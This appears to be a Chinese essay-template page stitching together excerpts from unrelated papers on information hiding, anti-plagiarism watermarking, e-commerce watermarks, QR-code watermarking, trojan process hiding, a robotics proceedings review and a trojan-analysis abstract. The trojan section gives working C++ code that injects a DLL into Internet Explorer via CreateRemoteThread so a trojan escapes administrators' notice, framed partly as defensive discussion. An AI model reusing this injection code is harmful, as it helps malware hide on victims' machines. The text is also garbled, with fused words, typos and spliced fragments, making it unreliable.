时间:2023-03-22 17:47:30
引言:寻求写作上的突破?我们特意为您精选了12篇隐藏技术论文范文,希望这些范文能够成为您写作时的参考,帮助您的文章更加丰富和深入。
信息隐藏的主要目的是让信息透明,将信息嵌入一定的载体中,使得信息无法被第三方识别,就像消失了一样,可以保证信息的安全性。但是信息隐藏技术不但能够将信息隐藏于无形中,还要能将信息恢复,并且恢复后的信息要与隐藏前一致,没有发生任何损失或破坏,保证其信息隐藏前后的完整性。
2、信息隐藏技术的防御攻击性
信息隐藏技术防御攻击的能力一定要很高,因为,网络通信中,信息技术会经常受到有意或无意的攻击,比如删除、非法攻击或篡改等,都会对隐藏的信息造成损害,因此,信息隐藏技术必须具备高的防御能力。此外,网络通信中经常出现信号处理,如调制、有损压缩、滤波等,也会对隐藏的信息造成破坏,所以,为了保障信息的安全,信息隐藏技术一定要拥有更强大的防御攻击的能力。
3、信息隐藏技术的嵌入量大
信息隐藏的目的是为了无法被其他人或电脑发现,为了提高信息隐藏的技术,要将需要隐藏的信息放入一个相对数据量大的载体中,因此,信息隐藏要选择一个信息量大的数据中。此外,还要满足隐藏算法所需要的空间,从而保证信息隐藏的无法识别,保证信息的安全。
4、信息隐藏技术的自我恢复
信息隐藏后一旦需要提取,要能够不需要原始载体信号,便可以从载体中将隐藏的信号提取出来,保证信息的完整。另外,将隐藏的信息提取出来后,要保证信息经过一系列的提取过程后,仍能保证信息的完好无损,有效保证信息的安全性。因此,信息隐藏技术必须要有高度的自我恢复能力。
二、网络通信中信息隐藏的技术途径
1、信息隐藏于音频信号中
将信息隐藏于音频信号中,是将嵌入信息所采用的域为依据,可将语音信息隐藏划分为时域音频隐藏、频域音频隐藏、离散余弦变换域音频隐藏三种。时域音频隐藏技术就是将音频信号的频率、幅度或结果进行处理,然后将其隐藏于音频信号中,是一种简单的隐藏技术。频域音频隐藏技术是将要隐藏的音频文件根据频域的区域进行处理,将需要隐藏的信息以伪噪声的方式嵌于音频信号中,从而达到隐藏的目的,并且很难被识别和发现。离散余弦变化域音频隐藏技术是需要隐藏的信息变换格式,再将变换后的信息嵌于音频信号中,起到深度隐藏的目的。此外,随着网络技术的发展和不断创新,音频信号隐藏还包括小波域隐藏技术和压缩域隐藏技术,效果都很好。
2、信息隐藏于图像信号中
信息隐藏于图像信号中主要有两种方式,一是空间域隐藏技术,就是利用空间替换法,将需要隐藏的信息替换到载体中,并且嵌入不重要的位置,例如将秘密信息嵌入像素点最低的有效位,实现信息的替换,从而保证信息的安全性;二是变换域隐藏技术,就是将需要隐藏的信息转换到变换域范围,变换域是一直在变动的,因此,秘密信息进入变换域后悔进行反复变换,从而使得信息隐匿其中,很难被发现。变换域隐藏技术相比于空间域隐藏技术拥有更好的隐藏效果,并且安全性高、防御攻击力强、自我恢复好,更适合信息的隐藏。
3、信息隐藏于文本信号中
信息隐藏于文本信息中,主要是将信息拆分为极其细碎的结构,然后将每个小部分分别隐藏于文本信息中,从而起到信息隐藏的目的。但是,文本信号需要庞大的数据量才能实现更好的信息隐藏,因此,在实际的应用中,应用率很低。此外,在网络通信中,音频信号隐藏技术和图像信号隐藏技术的隐蔽性远远好于文本信号,所以,文本信号隐藏信息的使用率低;同时,也由于文本信号的防御能力差、自我修复力也差,使得文本信号隐藏信息的安全性降低,不利于信息的隐藏。
中图分类号:TP311 文献标识码:A 文章编号:1009-3044(2012)36-8679-02
随着计算机应用的普及,高校正在逐步实现作业的电子化和网络化。这种作业形式的改革有效减少了教育资源的浪费,减轻了教师的工作任务,提高了学生获得作业批阅结果的效率,教与学得到了互动。应该说作业的电子化是高校教学改革的一种必然趋势,但随之而来的是电子作业抄袭现象严重。学生抄袭作业时,少则部分复制他人文档,调整文档顺序,内容稍做修改;多则大部分甚至全盘拷贝他人文档。学生对于电子作业的抄袭轻松快捷又不易被识别,这就成为作业改革受到严重困扰的主要因素。
在电子作业的反抄袭检查工作上,教师的手工操作既耗时又费力,尤以高校学生人数众多,涉及的教师面而变得局限性很大。那么,建立一种快速、准确、高校的电子作业反抄袭检查模型若能够有效遏制了学生间电子作业相互拷贝,具有十分现实的意义。目的在于能够极大地提高教学的质量和效率,并有力的促进高校的教育改革。在应用领域抄袭检测算法已成为当前研究的热点话题,尤其是在学术论文的剽窃比对上。而我们能够在平时的教学工作中有效地抵制电子作业的抄袭现象,既能真实反映教学效果又能提高学生自主学习的意识和能力。这不仅是对于教学工作的促进更是培养人教育人的有效途径。
1 抄袭检查技术
计算机技术的发展和网络普遍应用,在无意间方便了很多人进行文章抄袭。其实电子作业抄袭现象是国内外的大学广泛存在的现象,为了有力遏制学生的这种不诚信的行为,国外早在20世纪90年代就开始了相应研究。由于西方语系的特点英语是以空格作为单词间隔,因此英语的抄袭检查方法是通过比较关键词来判断相似性的,效率很高。而中文与外文间存在着巨大的差异性, 强调词法与句法,因此关键词比对较不适用于中文。
目前中文的抄袭检查方法主要有基于字符串的匹配、基于统计的中文分词、文档指纹、句子相似度等。
2 电子作业反抄袭检查的实现
该文主要采用两种方法以实现电子作业的反抄袭检查:数字指纹技术和信息隐藏技术。首先吸取了文数字指纹技术的优势并对于指纹技术的算法(Hash函数)做出改进提出一种基于局部词频的指纹算法。其次很多高校特有应用的实验实习电子作业,此时内容都较为相似,所以该文又增加了基于信息隐藏技术的作业反抄袭检查方法,以对于这类电子作业进行有效的比对。
2.1基于局部词频的指纹技术
文档数字指纹技术是依据生成的待比较的文档指纹,通过在样本库中做对比进行抄袭检测。当相匹配指纹数目超过一定值时,可认定存在抄袭行为。为使其具有推广力,一般会引入松弛因子以提高检测的准确性。指纹生成算法是文档数字指纹技术的关键,一般利用 Hash 函数对文档中的特征标记进行计算,获得整数值。一般需要计算函数。
在高校的电子作业中很多都仅是对作业的句子的长度或词语的先后次序作了调整,内容的变化是较小的,用这种方法就会过度精确,用于检查电子作业效率很低。所以该文对这种算法做出一定改进,提出一种基于词频统计的指纹技术。局部词频统计技术借助于向量空间模型来实现。这种向量空间模型是由句子为单位构成的,并对句子进行关键词提取,并对关键词重新排序构建,根据编码与词频共同获取句子的指纹。依据句子的指纹获取文本相似度,具体的算法描述
2.2信息隐藏技术
在高校学生作业有一些是比较特殊的,例如在机房中完成的实验实习类报告,这类作业的特点是内容大致是相同的。可以在作业的源头采用一些基于信息隐藏的嵌入水印算法。在对作业进行片段拷贝时就在源头嵌入水印,能有效的防止拷贝抄袭的现象发生。这样即使电子作业的内容完全相同也能有效的检查到。不能轻易被破坏。这类作业防抄袭检查的水印嵌入既要求字符格式改变不易被擦觉也要兼顾有较大的信息嵌入量,不需太多的字符就能嵌入进机房的机器号及上机完成作业的时间。
由于人眼的视细胞对颜色敏感度的理论指出人眼对绿色最敏感,其次是红色,而对于蓝色是最不敏感的。而计算机的颜色设置理论是数字化的,所以可以对于RGB()的值中低位的值做秘密信息嵌入。可以对R值和G值改变都改变最低的1位bit,而对B值最低的2位bit。这样就对每个电子文档的字符嵌入了4位bit的信息隐藏,并把这4位二进制作为嵌入信息隐藏1Byte的高4位。同时也可以利用字符下划线的B值最低2位bit,G值的最低1位bit,和R值的最低1位bit来隐藏4位信息。这4位bit作为嵌入信息隐藏1Byte的低4位。
在实际操作中程序所嵌入的信息包括程序读取的机器号及上机时间与机房管理系统数据库配合能准确定位学生的学号、姓名、班级等。当学生完成自己的电子作业过程中点击保存、Word程序自动保存、关闭Word文档时都会触发这一嵌入秘密信息的相关程序的运行,可以在全文实现循环嵌入秘密信息的作用。该反抄袭程序是在打开作业文档时自动运行,能自主识别学生作业中具有抄袭嫌疑的片段,协助教师对学生的作业给出客观评价,有效的对这类作业的抄袭起到屏蔽的作用。
3 结束语
在以往的反抄袭检查中主要是通过文档间内容重叠程度或者相似程度来断定的,相关的检查技术也很多也较成熟。但往往面对的是海量数据或是长文档,并需要对文档字符做精确检查。而在教学过程中的电子作业无论在内容、篇幅和数量方面都有很大差别。
该文的创新点是结合了基于局部词频的指纹技术和嵌入水印的信息隐藏技术,提出了一处主要针对高校的作业特点的反抄袭检查的模型。较为全面的考虑到了这类作业不同于学术剽窃的相关问题,所建立的这种快速、准确、高效的电子作业反抄袭检查模型能够在一定程度上遏制学生间电子作业相互拷贝,具有十分现实的意义。
参考文献:
[1] 蒋波.一种基于三重DES和RSA的综合加密方案[J].微计算机信息,2007(18).
[2] 陈国良.并行算法实践[M].北京:高等教育出版社,2004.
[3] 秦玉平,冷强奎,王秀坤,等. 基于局部词频指纹的论文抄袭检测算法[J].计算机工程,2011(6).
互联网技术的日新月异,使电子商务的发展变得更加迅猛。同时网络中一些不可预料的危险环节,也使电子商务安全问题成为人们关注的焦点。传统的认证和访问控制技术、密码技术并不能全面解决电子商务安全问题,所以一种新兴的信息安全技术——数字水印技术被应用到电子商务中。
一、数字水印定义、功能及原理
数字水印是信息隐藏技术的重要分支。所谓数字水印(DigitalWatermarking)是指嵌入数字载体(包括多媒体、文档、软件等)中的数字信号,它可以是图像、文字、符号、数字等所有可以作为标识的信息。数字水印既不影响原始载体的正常使用及存在价值,也不容易被人感知。
通过隐藏在载体中的标识信息即数字水印,可以达到验证和确认内容提供者、购买者、隐藏信息或判断载体是否被篡改等目的。
数字水印算法的原理大都相同,即对时(空)域或变换域中的一些参数进行微小的变动,在某些位置嵌入一定的数据,生成数字水印,当需要检测时,从载体中提取水印,与原水印进行比较,检测水印是否被篡改等。近年来研究者从不同角度提高和改进数字水印算法,其实都是以提高水印的鲁棒性为目的的。
典型的数字水印算法有以下几类:空域算法,变化域算法,压缩域算法,NEC算法,生理模型算法等。
二、数字水印的特点和分类
根据数字水印的定义及功能,可以看出数字水印具有以下几个特点。
不可见性:数字水印作为标识信息隐藏于数字作品中,对拦截者而言,应不可见。
安全性:数字水印应当具备难以篡改或伪造的要求,并应当具有较低的误检测率和较强的抵抗性
鲁棒性:在经过多种信号处理过程后,数字水印仍能保持部分完整性及检测的准确性。
脆弱性:能直接反映出水印是否遭受篡改等。
根据不同标准,数字水印分为以下几类。
按照水印特点划分:鲁棒性水印和脆弱水印。
按照水印隐藏位置划分:时域数字水印、空域数字水印、频域数字水印等。
按照水印检测过程划分:明文水印和盲水印。
按照水印是否可见划分:可见水印和不可见水印。
按照水印内容划分:有意义水印和无意义水印。
当然,数字水印还可以按照用途、水印载体等多种方式来划分成更多的小类,这里不再一一列举。三、数字水印技术在电子商务中的应用
数字水印技术在电子商务中的应用集中表现在电子商务安全保护问题中。电子商务安全可以分为网络安全和信息安全。网络安全复杂且受多种因素影响,要解决电子商务安全问题,必须把信息安全作为问题切入点。
目前,电子商务信息安全方面已经使用到了加密技术,安全认证技术等多种安全保护技术,但仍有部分问题得不到解决。
首先,电子商务中数字作品的版权保护问题。在知识产权体系日益完善的今天,版权问题已经成为人们关注的焦点问题,也是数字作品提供者必须正视的问题。研究者试图寻找一种方法,既不损害原作品,又达到版权保护的目的,于是,与传统水印功能几乎相同的“数字水印”被应用到电子商务中。数字水印技术利用信息隐藏原理使版权标志不可见或不可听,“悄然”存在与数字作品之中。
目前应用数字水印来解决版权保护问题多用在软件作品中,比较著名的就是IBM公司的“数字图书馆”软件的数字水印功能,以及Adobe公司的Photoshop软件中集成了Digimarc公司的数字水印插件。
其次,电子交易中的电子票据的防伪问题。随着商务活动电子化和自动化的转变,许多交易活动都转变为电子交易,其中电子票据的安全保护变得犹为重要。数字水印技术可以在交易双方的电子票据中嵌入交易时间和签名等认证信息,使交易过程具有不可抵赖性。而且数字水印技术在电子票据中隐藏了不可见的标识信息,无形中也增加了不法分子伪造篡改票据的难度。水印还具有法律效力,可以在交易出现法律纠纷时,作为证据使用。
还有,身份验证信息的真伪鉴别问题。目前,用于信息安全的加密技术对于电子形式的身份验证信息具有良好的保护功能,但无法作为书面凭证进行鉴别。而通过使用数字水印技术,把电子身份验证信息隐藏到普通的凭证图像当中,使身份凭证具有不可复制和不可抵赖等特性,实现了电子信息和书面信息的双重保护。
重要标识信息的隐藏和篡改提示。许多交易作品的使用必须依赖作品中一些标识信息,如果直接把此类信息标注在原始作品上,会引起一些不必要的麻烦,而利用数字水印技术就可以把重要信息隐藏在原始作品中,通过特殊的阅读程序(水印检测工具等)来读取。数字水印技术还可以用于数字信号的篡改提示,通过水印的状态来检测数字信号是否遭到篡改。
通信过程的信息隐藏。用于信息安全保护的常用方法是对数据进行加密,这样往往更容易引起攻击方的注意,从另一个角度出发,在人类视觉、听觉等无法感知的范围之内,对各种时(空)域、变换域进行微小的改变,从而实现信息隐藏,达到通信过程信息安全保护的目的。
四、结束语
数字水印技术作为一种新兴的安全保护技术应用到电子商务中,表现出其显著的作用和功效,因为区别于传统的数据加密技术或安全认证技术,为信息安全保护领域带来了新思路。但是,由于目前数字水印技术本身并不完善,应用到电子商务中还存在很多实际的问题。例如,水印检测的简便性,水印的鲁棒性,等等,这些也将作为研究者进一步努力的方向。
1 二维码水印加密背景及目前加密解密现状
1.1 QR二维码的应用背景
随着中国3G技术的普及,以及手机本身性能的提高,二维码作为一种全新的信息存储、传递和识别技术迅速地融入到了社会生活当中,其保密和安全问题也越来越有研究价值,2012年铁道部出现了用户隐私资料信息被二维码泄密的问题,病毒也开始通过二维码传播。目前国内针对二维码数字加密的技术的论述并不多,在当前期刊网上有关二维码讨论的258篇论文也主要集中于二维码自身的编码解码规则,只有16篇是讨论二维码数字手段加密的。其中加密采取的主要手段是通过复杂昂贵的隐形印刷技术。而讨论数字加密的只是对一般图像都通用的结合水印加密,未能很好的结合QR二维码自身的编码规则,所能负载的加密信息量也极少[3]。
1.2 国内外二维码加密研究现状
目前,国内外关于二维码信息隐藏技术的文献不是很多,研究对象主要是四一七条码(Portable Data File417,PDF417码)和QR码。在国内,针对PDF417码的研究较多且以空域水印为主,在国外,以研究QR码居多,以频域水印为主。牛夏牧[7]等利用变形技术对PDF417码中的各组成单元宽度加以适量的变动,采用误差累积的方式实现隐藏信息的嵌入和提取。陈峥等[3]针对PDF417码,提出了基于边界移位的隐藏信息嵌入算法。赵博等[4]提出一种基于结构微调法的水印算法,对PDF417码的组成条空进行适量的微调,将信息隐藏进二维码中。晁玉海等[5]提出一种对隐藏信息进行扩频和映射处理,根据PDF417码自身结构特点,通过微调条码中的条和空将信息隐藏的方法。Ming Sun等[6]提出两种基于离散小波变换(Discrete Wavelet Transform,DWT)变换的QR码数字水印,分别可以嵌入随机序列和图片。Jau-Ji Shen等[7]针对PDF417码提出一种称作关联水印的盲水印算法,该算法可以提高水印的嵌入容量并可将PDF417码用于数据认证。
⑴二维码图和传统防伪制作技术(主要是印刷)相结合,避免码图被直接影印、拍照,比如采用隐形印刷等等;
⑵掌握二维码编码技术,对二维码码图本身做特殊处理(如加密、复合、变形等),这种方法的目的有二,一是可以让别人的识读软件无法识别码图,二是可以在这些码图中编入特别信息,以作防伪校验之用。
简而言之,一个采用特殊印刷技术,一个采用特殊编码,从而提高技术门槛也就提高了造假的成本与难度。本文研究算法基于第二种方式,对二维码码图进行特殊处理,达到嵌入 信息进行防伪校验目的。
2 适用于QR的数字水印算法
2.1 水印的嵌入算法
2.1.1 水印嵌入位置及表示方案
链码和QR二维码水印信息的位置选择和像素值改变方案,根据链码、改进的LSB算法和二维码的基本理论,本文结合处如下表示方案。QR码图像是由N*N个深色或者浅色的模块图形组成,实验中是黑色和白色模块。考虑水印需要的隐蔽性,我们选取黑色的正方形作为水印嵌入单元。假设QR码的一个模块图形的大小为M*M,其中M为模块的长度(高度),单位是像素。条码矩阵的大小为N*N。每个正方形基元占用的像素点为M/N。
如图2.1所示:跟四链码的结合方式为将正方形基元平分成四等份,每一块的大小为M/2N,选择其中的一块,按统一水印规则改变整个选中块的像素值,嵌入水印信息,按照链码方向的规则给四个方向的小矩阵编码为0,1,2,3,四幅图中的红色区域分别对应着0,1,2,3。这样每个黑色QR码的正方形基元便可以承载一位四进制的数。当图像格式为RGB三色图时,结合第一章所介绍的改进的LSB编码规则,每一块像素值按规则改变后又可表示为00,01,10,11的四进制,跟位置的编码规则相结合,每个正方形模块就可以表示一位十六进制的数,也就是4bit的信息。
2.1.2 水.印嵌入流程
如图2.2 水印算法的整体嵌入步骤:
第一步:根据基本信息编码出未加密的二维码举证,自左向右,自上而下,统计N*N黑色和白色模块的QR二维码可用来嵌入水印的黑色模块的个数,记为C,并记录下各个可用的黑色模块在二维码的二维矩阵中的位置。
第二步:依据伪指纹特征随机密钥生成技术,随机生成三个指纹特征数据记为T1、T2、T3,并将T1、T2、T3转码成和水印嵌入方式所采用的编码进制(八进制、十六进制等)相同的编码进制,统计出T1,T2,T3所需要的占用编码位数记为n1,n2,n3。
第三步:如果n1+n2+n3>c,则说明水印嵌入位置不足以嵌入所有的指纹特征数据,当嵌入位置不足时采用基于模拟退火算法竞争机制,解决各个特征信息之间采样数竞争问题,模拟退火的优势能保证了嵌入位置的随机性,和各个特征信息的均衡性。
第四步:依照模拟退火算法竞争机制产生的二维指纹矩阵加密位置对应表,对QR二维码图形进行加密。
2.2 水印的提取算法
如图2.3:首先,从加密的二维码图片中解码出二维码的基本信息。
将加密后的二维码图片记为map1和未水印加密的二维图片记为map2,导入解码程序中。
第二步:将相应的两幅图像做减法代数运算,提取图像中目标区域,给定阈值大小为水印差值的一半,将低于阈值的像素点看作相同像素点,差值取绝对值选取为了实现精确定位,因为两幅图像编码格式一致,除了不通目标区域以外,其他区域完全相同,包括图像大小等。
第三部:使用数学形态学方法,实现断线的连接,主要目的是保持目标区域边缘连续,为孤立点的去除做准备。第三步:使用改进中值滤波去除图像中孤立异常点,如果除了目标区域以外,其他区域完全相同,那么基本不需要去处异常点,在做加入噪声干扰实验时去除边缘毛边是一个需要除了的问题。
第四步:采用曲线全向跟踪技术,寻找目标区域的边缘轮廓,探查到所有目标区域边缘。
第五步:将图像按照二维码自身的编码规则分成N*N块,根据上图中提取去的各个嵌入水印的矩形区域的位置,并将区域大小经过阈值判断,去掉干扰点,定位出各个区域对应得编码值,返回二维矩阵各个嵌入水印值位置对应得值。和加密时候保存的加密二维矩阵值进行对比,进行水印验证。
3 实验
含有水印的QR码的识别和提取实验
算法稳定性实验,流程如下:
(1)产生一段随机长度和随机内容的文本T1。
(2)将文本T1编码为QR码图形Q1。
(3)计算Q1的水印容量大小。
(4)通过通过随机指纹发生器和模拟退火竞争机制产生水印信息W。
(5)向Q1中嵌入水印信息W得到含有水印的QR码图形Q2。
(6)识读Q2得到T2,并与原始编码内容T1对比,记录对比结果。
(7)从含有水印的QR码图形Q2中提取水印信息WR。
(8)比较W和WR,记录对比结果。
(9)重复1000次步骤(1)~(8)的试验,并计算QR码的识别正确率和水印嵌入和提取的正确率。
随机文本T包含英文字母、数字和常用标点符号。重复试验的次数为100次,最后记录实验结果并计算正确率。实验最终得到的数据是QR码的识别正确率为97%,嵌入和提取水印的正确率为95%。该实验表明,水印算法非常稳定,嵌入的水印不会影响到QR码的正确识别,并且水印信息的嵌入和提取不受水印内容和QR码载体图像的影响。
4 结论
提出了一种适用于QR码的鲁棒性和嵌入信息量都适中的水印算法,该算法用链码的方向编码和改进的LSB算法嵌入水印信息,保证水印信息不会改变QR码的图形结构,并确保嵌入的水印信息不会影响到QR码的正确识别。与现有的利用误差特性进行信息隐藏的算法相比,该算法极大程度增强了数字水印的隐蔽性,提高了水印信息的嵌入量。同时算法不会受到QR码的容量限制,并且适合电子保存和打印等多种形式,具有提取水印速度快,抗干扰能力强等优势。并且提出了由多种生物特征提取出的信息组成水印信息的方式,将二维码与用户绑定,实现了人码一体的认证功能。
[参考文献]
[l]何叶.基于二维条码的数字水印技术研究.长沙理工大学硕士学位论文.(2009).
[2]赵博.二维条码研究.西安电子科技大学硕士学位论文.(2007).
[3]纪兴中.基于二维条码技术的数字水印系统研究.浙江工业大学硕士学位论文.(2007).
[4]陈哲,张永林.数字水印技术在二维条码证件防伪中的应用.计算机工程与科学.28(4).42-44.(2006).
关键字进程线程木马动态链接库
木马程序(也称后门程序)是能被控制的运行在远程主机上的程序,由于木马程序是运行在远程主机上,所以进程的隐藏无疑是大家关心的焦点。
本文分析了WindowsNT/2000系统下进程隐藏的基本技术和方法,并着重讨论运用线程嫁接技术如何实现WindowsNT/2000系统中进程的隐藏。
1基本原理
在WIN95/98中,只需要将进程注册为系统服务就能够从进程查看器中隐形,可是这一切在WindowsNT/2000中却完全不同,无论木马从端口、启动文件上如何巧妙地隐藏自己,始终都不能躲过WindowsNT/2000的任务管理器,WindowsNT/2000的任务管理器均能轻松显示出木马进程,难道在WindowsNT/2000下木马真的再也无法隐藏自己的进程了?我们知道,在WINDOWS系统下,可执行文件主要是Exe和Com文件,这两种文件在运行时都有一个共同点,会生成一个独立的进程,寻找特定进程是我们发现木马的方法之一,随着入侵检测软件的不断发展,关联进程和SOCKET已经成为流行的技术,假设一个木马在运行时被检测软件同时查出端口和进程,我们基本上认为这个木马的隐藏已经完全失败。在WindowsNT/2000下正常情况用户进程对于系统管理员来说都是可见的,要想做到木马的进程隐藏,有两个办法,第一是让系统管理员看不见你的进程;第二是不使用进程。本文以第二种方法为例加以讨论,其基本原理是将自已的木马以线程方式嫁接于远程进程之中,远程进程则是合法的用户程序,这样用户管理者看到的只是合法进程,而无法发现木马线程的存在,从而达到隐藏的目的。
2实现方法
为了弄清实现方法,我们必须首先了解Windows系统的另一种"可执行文件"----DLL,DLL是DynamicLinkLibrary(动态链接库)的缩写,DLL文件是Windows的基础,因为所有的API函数都是在DLL中实现的。DLL文件没有程序逻辑,是由多个功能函数构成,它并不能独立运行,一般都是由进程加载并调用的。因为DLL文件不能独立运行,所以在进程列表中并不会出现DLL,假设我们编写了一个木马DLL,并且通过别的进程来运行它,那么无论是入侵检测软件还是进程列表中,都只会出现那个进程而并不会出现木马DLL,如果那个进程是可信进程,(例如浏览器程序IEXPLORE.EXE,没人会怀疑它是木马吧?)那么我们编写的DLL作为那个进程的一部分,也将成为被信赖的一员,也就达到了隐藏的目的。
运行DLL方法有多种,但其中最隐蔽的方法是采用动态嵌入技术,动态嵌入技术指的是将自己的代码嵌入正在运行的进程中的技术。理论上来说,在Windows中的每个进程都有自己的私有内存空间,别的进程是不允许对这个私有空间进行操作的,但是实际上,我们仍然可以利用种种方法进入并操作进程的私有内存。动态嵌入技术有多种如:窗口Hook、挂接API、远程线程等,这里介绍一下远程线程技术,它只要有基本的进线程和动态链接库的知识就可以很轻松地完成动态嵌入。
远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。我们知道,在进程中,可以通过CreateThread函数创建线程,被创建的新线程与主线程(就是进程启动时被同时自动建立的那个线程)共享地址空间以及其他的资源。但是很少有人知道,通过CreateRemoteThread也同样可以在另一个进程内创建新线程,被创建的远程线程同样可以共享远程进程(是远程进程)的地址空间,所以,实际上,我们通过一个远程线程,进入了远程进程的内存地址空间,也就拥有了那个远程进程相当的权限。
3实施步骤
1)用Process32Next()函数找到宿主进程,获取宿主进程ID,并用
OpenProcess()函数打开宿主进程。
2)用VirtualAllocEx()函数分配远程进程地址空间中的
内存。
3)用WriteProcessMemory()函数将待隐藏的DLL的路径名。
4)拷贝到步骤二已经分配的内存中。
5)用GetProcAddress()函数获取LoadlibraryA()函数的实地址(在kernel32.dll中)。
6)用CreateRemoteThread()函数在远程进程中创建一个线程。
7)它调用正确的LoadlibraryA()函数。
8)为它传递步骤二中分配的内存地址。
4具体实例
下面是在C++Builder4.0环境下编写的运用远程线程技术隐藏木马的程序代码:
#include<vcl.h>
#include<windows.h>
#include<stdio.h>
#include<tlhelp32.h>//该头文件包涵了进程操作的API函数
#pragmahdrstop
#include"Unit1.h"
#pragmapackage(smart_init)
#pragmaresource"*.dfm"
InsistingpszLibFileName;//存放待隐藏的DLL文件名
HANDLEhProcessSnap=NULL;//进程快照句柄
HANDLEhRemoteProcess;//远程进程句柄
LPVOIDpszLibFileRemote;//远程进程中分配给文件名的空间
HMODULEphmd;//存放kernel32.dll句柄
HANDLEhRemoteThread1=NULL;//存放远程线程句柄
TForm1*Form1;
//---------------------------------------------------------
__fastcallTForm1::TForm1(TComponent*Owner)
:TForm(Owner)
{
}
//---------------------------------------------------------
void__fastcallTForm1::Button1Click(TObject*Sender
{
PROCESSENTRY32pe32={0};
DWORDdwRemoteProcessId;
hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
//打开进程快照
if(hProcessSnap==(HANDLE)-1)
{
MessageBox(NULL,"CreateToolhelp32Snapshotfailed","",MB_OK);
exit(0);
}//失败返回
pe32.dwSize=sizeof(PROCESSENTRY32);
if(Process32Fi
rst(hProcessSnap,&pe32))//获取第一个进程
{
do{
AnsiStringte;
te=pe32.szExeFile;
if(te.Pos("iexplore.exe")||te.Pos("IEXPLORE.EXE"))
//找到宿主进程,以IEXPLORE.EXE为例
{dwRemoteProcessId=pe32.th32ProcessID;
break;
}
}
while(Process32Next(hProcessSnap,&pe32));//获取下一个进程
}
else
{
MessageBox(NULL,"取第一个进程失败","",MB_OK);
exit(0);
}
hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM
_OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);
//打开远程进程
pszLibFileName=GetCurrentDir()+"\\"+"hide.dll";
//假设hide.dll是待隐藏的进程
intcb=(1+pszLibFileName.Length())*sizeof(char);//计算dll文件名长度
pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,
MEM_COMMIT,PAGE_READWRITE);
//申请存放文件名的空间
BOOLReturnCode=WriteProcessMemory(hRemoteProcess,
pszLibFileRemote,(LPVOID)pszLibFileName.c_str(),cb,NULL);
//把dll文件名写入申请的空间
phmd=GetModuleHandle("kernel32.dll");
LPTHREAD_START_ROUTINEfnStartAddr=(LPTHREAD_START_ROUTINE)
GetProcAddress(phmd,"LoadLibraryA");
//获取动态链接库函数地址
hRemoteThread1=CreateRemoteThread(hRemoteProcess,NULL,0,
pfnStartAddr,pszLibFileRemote,0,NULL);
//创建远程线
if(hRemoteThread1!=NULL)
CloseHandle(hRemoteThread1);//关闭远程线程
if(hProcessSnap!=NULL)
CloseHandle(hProcessSnap);//关闭进程快照
}
该程序编译后命名为RmtDll.exe,运行时点击界面上的按钮即可。
至此,远程嵌入顺利完成,为了试验我们的hide.dll是不是已经正常地在远程线程运行,我同样在C++Builder4.0环境下编写并编译了下面的hide.dll作为测试:
nclude<vcl.h>
#include<windows.h>
#pragmahdrstop
#pragmaargsused
BOOLWINAPIDllEntryPoint(HINSTANCEhinst,unsignedlongreason,void*lpReserved)
{
charszProcessId[64];
switch(reason)
{
caseDLL_PROCESS_ATTACH:
{//获取当前进程ID
itoa(GetCurrentProcessId(),szProcessId,10);
MessageBox(NULL,szProcessId,"RemoteDLL",MB_OK);
break;
}
default:
}
returnTRUE;
}
当使用RmtDll.exe程序将这个hide.dll嵌入IEXPLORE.EXE进程后假设PID=1208),该测试DLL弹出了1208字样的确认框,同时使用PS工具
也能看到:
ProcessID:1208
C:\WINNT\IEXPLORE.EXE(0x00400000)
……
C:\WINNT\hide.dll(0x100000000)
……
这证明hide.dll已经在IEXPLORE.EXE进程内正确地运行了。上面程序的头文件由编译器自动生成,未作改动,故略之。
5结束语
进程隐藏技术和方法有很多,而且这一技术发展也相当快,本文仅从一个侧面加以讨论,希望通过这一探讨让我们对进程隐藏技术有一个更清楚的认识,同时也为我们防范他人利用进程隐藏手段非法入侵提供参考,本文抛砖引玉,不当之处诚恳批评指正。
Walking Robots
Proceedings of 10th International Conference(CLAWAR 2007)
2007,763pp
Hardback
ISBN9789812708151
M.谢等编
机器人学是工程及自然科学中令人神往的领域。机器人学已经对许多工业做出重要贡献,工业机器人在诸如组装、焊接、油漆及材料处理之类的任务中广泛应用。与些同时,我们又目睹了特殊机器人的出现,它们在非工业环境中执行有价值的任务,这些任务包括搜索与救援、扫雷、监测、探险及安全保卫。此外,对在民用及专业服务部门中机器人的技术研究及发展工作正在进行。类似攀登与行走机器人这类用于在非结构性环境中执行任务的移动机器人的兴起,进一步加剧了机器人学研究必须面对的挑战。这种挑战不仅包括了涉及标准化在内的技术与工程方面,而且也包括了社会、经济与伦理方面。CLAWAR2007于2007年7月16-18日在新加坡举行,该系列国际会议自1998年起每年举行,这次是第10届。总共有来自五大洲22个国家的作者在CLAWAR2007上做介绍,这本会议录报道了攀登及行走机器人的最新研发振奋人心的应用及挑战。
本书汇集的论文共分成了5个部分。1.全体会议介绍,5篇论文;2.攀登机器人进展,26篇论文;3.行走机器人进展,24篇论文;4.似人足球机器人进展,5篇论文;5.支持技术,27篇论文。部分论文标题为:1.救援机器人滑动插座移动模块;2.有攀登腿的带轮子爬墙机器人;3.用于快速四脚移动的进化神经网络;4.绳索攀登机器人的设计与构造;5.用于长焊接线检验的攀登机器人开发;6.关于利用陀螺效应二足移动的提议;7.新型腿-轮行走机器人的设计与问题;8.利用滞后算法的似人机器人RH1的脚规划运动;9.局部模块化行走机器人的运动模拟;10.行走双脚机器人基于观测器的控制:稳定性分析;11.三维双脚机器人无驱动动态行走研究;12.ROTOPOD:一种新颖的有效带腿移动;13.似人足球机器人的分布式嵌入控制系统结构;14.快速行走拟人足球机器人的最佳性能:实证研究;15.双臂系统并行规划算法;16.利用平均移位算法的全局定域化问题方法;17.MCA2机器人控制应用的可扩展模块化框架;18.灵活连接机械手的基于隐藏马尔可失模型的模糊控制器。
本书可供从事机器人研究与开发的研究人员、工程师阅读借鉴。
胡光华,
高级软件工程师
中图分类号:TP393.08文献标识码:A文章编号:1007-9599 (2010) 10-0000-01
Trojan Attack Analysis and Response
Tang Yi
(Suzhou University of Science and Technology,Suzhou215009,China)
Abstract:This paper analyzes Trojan horse attacks,Trojan horse attacks are described details the main technology,and then launched a discussion of their responses,given the idea of testing procedures.
